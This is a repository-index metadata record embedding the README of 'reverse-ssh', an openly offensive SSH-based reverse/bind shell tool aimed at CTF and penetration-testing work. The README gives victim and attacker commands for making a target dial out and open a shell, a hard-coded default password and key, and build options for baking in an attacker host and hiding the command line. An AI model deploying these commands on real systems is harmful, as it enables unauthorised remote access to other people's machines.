{"id":13505356,"url":"https://github.com/Fahrj/reverse-ssh","last_synced_at":"2025-03-29T23:31:29.081Z","repository":{"id":37818302,"uuid":"385345059","full_name":"Fahrj/reverse-ssh","owner":"Fahrj","description":"Statically-linked ssh server with reverse shell functionality for CTFs and such","archived":false,"fork":false,"pushed_at":"2023-02-15T00:16:25.000Z","size":4197,"stargazers_count":926,"open_issues_count":9,"forks_count":132,"subscribers_count":13,"default_branch":"master","last_synced_at":"2024-11-01T02:35:21.366Z","etag":null,"topics":["backdoor","conpty","golang","hacking","penetration-testing","penetration-testing-tools","remote-admin-tool","remote-shell","reverse-shell","security","security-tools","ssh","terminal"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Fahrj.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-07-12T18:26:29.000Z","updated_at":"2024-10-23T15:43:40.000Z","dependencies_parsed_at":"2024-06-18T20:00:38.007Z","dependency_job_id":"46ffbbc4-876d-4b6f-84e6-dfbfb52084a9","html_url":"https://github.com/Fahrj/reverse-ssh","commit_stats":{"total_commits":60,"total_committers":3,"mean_commits":20.0,"dds":0.08333333333333337,"last_synced_commit":"b5b9a0d482367bcf4505b01115a9abf1c652c6c6"},"previous_names":[],"tags_count":4,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Fahrj%2Freverse-ssh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Fahrj","download_url":"https://codeload.github.com/Fahrj/reverse-ssh/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246258884,"owners_count":20748573,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","conpty","golang","hacking","penetration-testing","penetration-testing-tools","remote-admin-tool","remote-shell","reverse-shell","security","security-tools","ssh","terminal"],"created_at":"2024-08-01T00:01:03.275Z","updated_at":"2025-03-29T23:31:24.072Z","avatar_url":"https://github.com/Fahrj.png","language":"Go","readme":"# ReverseSSH\n\n**A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.**\n\nHas been developed and was extensively used during OSCP exam preparation.\n\n**[Get the latest Release](https://github.com/Fahrj/reverse-ssh/releases/latest)**\n\n![Showcase](assets/showcase.gif)\n\n\n## Features\n\nCatching a reverse shell with _netcat_ is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory?\nBesides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.\n\nInstead, you can go the way to simply deploy the **lightweight ssh server** (\u003c1.5MB) `reverse-ssh` onto the target, and use additional commodities such as **file transfer** and **port forwarding**!\n\nReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation.\nIts main strengths are the following:\n\n* **Fully interactive shell access** (check caveats for old windows versions below)\n* **File transfer via sftp**\n* **Local / remote / dynamic port forwarding**\n* **Can be used as bind- and reverse-shell**\n* Supports **Unix** and **Windows** operating systems\n\n**Windows caveats**\n\nA fully interactive powershell on windows relies on [Windows Pseudo Console ConPTY](https://devblogs.microsoft.com/commandline/windows-command-line-introducing-the-windows-pseudo-console-conpty/) and thus requires at least `Win10 Build 17763`.\nOn earlier versions you can still get an interactive reverse shell that can't handle virtual terminal codes such as arrow keys or keyboard interrupts.\nIn such cases you have to append the `cmd` command, i.e. `ssh \u003cOPTIONS\u003e \u003cIP\u003e cmd`.\n\nYou can achieve full interactive shell access for older windows versions by dropping `ssh-shellhost.exe` [from OpenSSH for Windows](https://github.com/PowerShell/Win32-OpenSSH/releases/latest) in the same directory as `reverse-ssh` and then use flag `-s ssh-shellhost.exe`.\nThis will pipe all traffic through `ssh-shellhost.exe`, which mimics a pty and transforms all virtual terminal codes such that windows can understand.\n\n\n## Requirements\n\nSimply executing the provided binaries only relies on [golang system requirements](https://github.com/golang/go/wiki/MinimumRequirements#operating-systems).\n\nIn short:\n\n* **Linux**: kernel version 2.6.23 and higher\n* **Windows**: Windows Server 2008R2 and higher or Windows 7 and higher\n\nCompiling additionally requires the following:\n\n* golang version 1.15\n* optionally `upx` for compression (e.g. `apt install upx-ucl`)\n\n\n## Usage\n\nOnce `reverse-ssh` is running on the victim, you can connect with any username and the default password `letmeinbrudipls`, the ssh key or whatever you specified during compilation.\nAfter all, it is just an ssh server:\n\n```\n# Fully interactive shell access\n$ ssh -p \u003cRPORT\u003e \u003cRHOST\u003e\n\n# Simple command execution\n$ ssh -p \u003cRPORT\u003e \u003cRHOST\u003e whoami\n\n# Full-fledged file transfers\n$ sftp -P \u003cRPORT\u003e \u003cRHOST\u003e\n\n# Dynamic port forwarding as SOCKS proxy on port 9050\n$ ssh -p \u003cRPORT\u003e -D 9050 \u003cRHOST\u003e\n```\n\n### Running ReverseSSH as bind shell\n\n```\n# Victim\nvictim$ ./reverse-ssh\n\n# Attacker (default password: letmeinbrudipls)\nattacker$ ssh -p 31337 \u003cRHOST\u003e\n```\n\n### Running ReverseSSH as reverse shell\n\nNote: you can compile ReverseSSH with parameters for LHOST and LPORT to ease execution on the target, [see below](#build-tricks)\n\n```\n# On attacker (get ready to catch the incoming request;\n# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)\n# NOTE: LPORT of 8888 collides with incoming connections; use the flag `-b 8889` or similar on the victim in that case\nattacker$ ./reverse-ssh -v -l -p \u003cLPORT\u003e\n\n# On victim\nvictim$ ./reverse-ssh -p \u003cLPORT\u003e \u003cLHOST\u003e\n# or in case of an ssh daemon listening at port 22 with password authentication for user 'kali'\nvictim$ ./reverse-ssh -p 22 kali@\u003cLHOST\u003e\n\n# On attacker (default password: letmeinbrudipls)\nattacker$ ssh -p 8888 127.0.0.1\n# or with ssh config from below\nattacker$ ssh target\n```\n\nIn the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22.\nJust prepend `\u003cUSER\u003e@` and provide the password once asked to do so.\nDialling home currently is password only, because I didn't feel like baking a private key in there as well yet...\n\nFor even more convenience, add the following to your `~/.ssh/config`, copy the [ssh private key](assets/id_reverse-ssh) to `~/.ssh/` and simply call `ssh target` or `sftp target` afterwards:\n\n```\nHost target\n        Hostname 127.0.0.1\n        Port 8888\n        IdentityFile ~/.ssh/id_reverse-ssh\n        IdentitiesOnly yes\n        StrictHostKeyChecking no\n        UserKnownHostsFile /dev/null\n```\n\n### Full usage\n\n```\nreverseSSH v1.2.0  Copyright (C) 2021  Ferdinor \u003cferdinor@mailbox.org\u003e\n\nUsage: reverse-ssh [options] [[\u003cuser\u003e@]\u003ctarget\u003e]\n\nExamples:\n  Bind:\n        reverse-ssh -l\n        reverse-ssh -v -l -p 4444\n  Reverse:\n        reverse-ssh 192.168.0.1\n        reverse-ssh kali@192.168.0.1\n        reverse-ssh -p 31337 192.168.0.1\n        reverse-ssh -v -b 0 kali@192.168.0.2\n\nOptions:\n        -l, Start reverseSSH in listening mode (overrides reverse scenario)\n        -p, Port at which reverseSSH is listening for incoming ssh connections (bind scenario)\n                or where it tries to establish a ssh connection (reverse scenario) (default: 31337)\n        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)\n        -s, Shell to spawn for incoming connections, e.g. /bin/bash; (default: /bin/bash)\n                for windows this can only be used to give a path to 'ssh-shellhost.exe' to\n                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)\n        -N, Deny all incoming shell/exec/subsystem and local port forwarding requests\n                (if only remote port forwarding is needed, e.g. when catching reverse connections)\n        -v, Emit log output\n\n\u003ctarget\u003e\n        Optional target which enables the reverse scenario. Can be prepended with\n        \u003cuser\u003e@ to authenticate as a different user other than 'reverse' while dialling home\n\nCredentials:\n        Accepting all incoming connections from any user with either of the following:\n         * Password \"letmeinbrudipls\"\n         * PubKey   \"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi\"\n```\n\n\n## Build instructions\n\nMake sure to install the above requirements such as golang in a matching version and set it up correctly.\nAfterwards, you can compile with `make`, which will create static binaries in `bin`.\nUse `make compressed` to pack the binaries with upx to further reduce their size.\n\n```\n$ make\n\n# or to additionally created binaries packed with upx\n$ make compressed\n```\n\n### Build tricks\n\nYou can also specify one or more of the following environmental variables when compiling to customize ReverseSSH to your use case:\n\n* `RS_SHELL` to change the default shell\n* `RS_PASS` to provide your personalized password\n* `RS_PUB` to provide your personalized an authorized key\n* `LUSER` to change the default username of the ssh connection attempt\n* `LHOST` to provide a default LHOST value and make **ReverseSSH default to the reverse scenario**\n* `LPORT` to change the default listening port or port where an ssh connection attempt is sent to\n* `BPORT` to change the default listening port of reverse connections on the attacker machine; **0 means any free port is taken**\n* `NOCLI` with any value removes all user-facing interaction (the binary ignores all supplied flags or arguments)\n\n```shell\n$ ssh-keygen -t ed25519 -f id_reverse-ssh\n\n$ RS_SHELL=\"/bin/sh\" RS_PASS=\"secret\" RS_PUB=\"$(cat id_reverse-ssh.pub)\" make compressed\n\n$ LHOST=\"192.168.0.10\" LPORT=\"443\" BPORT=\"0\" RS_PUB=\"$(cat id_reverse-ssh.pub)\" make compressed\n```\n\n### Building for different operating systems or architectures\n\nBy default, `reverse-ssh` is compiled for your current OS and architecture, as well as for linux and windows in x86 and x64.\nTo compile for other architectures or another OS you can provide environmental variables which match your target, e.g. for linux/arm64:\n\n```\n$ GOARCH=arm64 GOOS=linux make compressed\n```\n\nA list of available targets in format `OS/arch` can be obtained via `go tool dist list`.\n\n\n## Contribute\n\nIs a mind-blowing feature missing? Anything not working as intended?\n\n**Create an issue or pull request!**\n","funding_links":[],"categories":["Standard SSH servers","Go","Hacking 💀"],"sub_categories":["Apps (Terminal)"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFahrj%2Freverse-ssh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FFahrj%2Freverse-ssh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FFahrj%2Freverse-ssh/lists"}